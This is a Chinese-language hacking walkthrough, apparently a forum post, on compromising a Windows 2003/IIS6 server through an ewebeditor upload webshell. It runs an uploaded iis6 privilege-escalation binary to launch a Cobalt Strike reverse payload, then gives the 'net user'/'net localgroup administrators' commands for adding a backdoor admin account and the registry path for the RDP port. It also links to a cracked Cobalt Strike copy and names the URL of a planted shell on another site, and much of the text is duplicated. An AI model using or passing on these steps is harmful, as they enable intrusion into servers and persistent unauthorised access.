介绍
相信明眼人一看就知道是ewebeditor编辑器拿的shell 我就不多说方法了 ..
首先上传 cmd.exe iis6.exe 到Z:\RECYCLER\ 也就是回收站
因为支持aspx 所以可以直接执行命令
算了 上个图吧 无图无真相不是
因为iis6是支持 后缀是txt 等各式的 都可以执行命令 稍微等一下 权限很大
接下来我们等一下 打开cobaltstrike 有如下选项
我们选择左下角的ADD增加一个Listeners(监听)
设置如左图 然后点击Save
这样就算增加了一个监听的payload端口是5656
在然后选择attacks选项
选择如左图
选择了Generate以后 保存的位置 跟名字
随便起一个名字
接下来最后一步执行..(草 图好多)
不一会就会反弹回来
为权限比较大,反弹回来就是system的权限,,我们直接选择cmdshell
添加上管理员即可,终端号可以在注册表查询
Armitage是一个图形化的metasploit网络攻击管理工具,它可视化你的攻击目标,推荐exploit和公开了metasploit框架的高级功能。
Armitage是一款Java写的Metasploit图形界面的攻击软件,可以用它结合Metasploit已知的exploit来针对存在的漏洞自动化攻击。bt5、kali linx 下集成免费版本Armitage,Cobalt Strike是它的商业版本,乃们懂得,图形界面非常友好,一键傻瓜化使用MSF高级功能,自动攻击测试。但是不对我大天朝出口,免费使21天,剩下的你们懂的,不喜欢图形界面的筒子请无视。友情提示:win版本请自测有无捆绑。
下载地址如下 http://www.freebuf.com/tools/8445.html(破解版)
http://xxoo.com.cn/ewebeditor/UploadFile/2013717212415335.asa
win2k3+支持aspx
相信明眼人一看就知道是ewebeditor编辑器拿的shell 我就不多说方法了 ..
首先上传 cmd.exe iis6.exe 到Z:\RECYCLER\ 也就是回收站
因为支持aspx 所以可以直接执行命令
算了 上个图吧 无图无真相不是
因为iis6是支持 后缀是txt 等各式的 都可以执行命令 稍微等一下 权限很大
接下来我们等一下 打开cobaltstrike 有如下选项
我们选择左下角的ADD增加一个Listeners(监听)
设置如左图 然后点击Save
这样就算增加了一个监听的payload端口是5656
在然后选择attacks选项
选择如左图
选择了Generate以后 保存的位置 跟名字
随便起一个名字
接下来最后一步执行..(草 图好多)
cmd路径
Z:\RECYCLER\cmd.exe
语句:
/c Z:\RECYCLER\iis6.xtx "Z:\RECYCLER\eset.exe"
不一会就会反弹回来
为权限比较大,反弹回来就是system的权限,,我们直接选择cmdshell
net user admin 123 /add
net localgroup administrators admin /add
添加上管理员即可,终端号可以在注册表查询
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp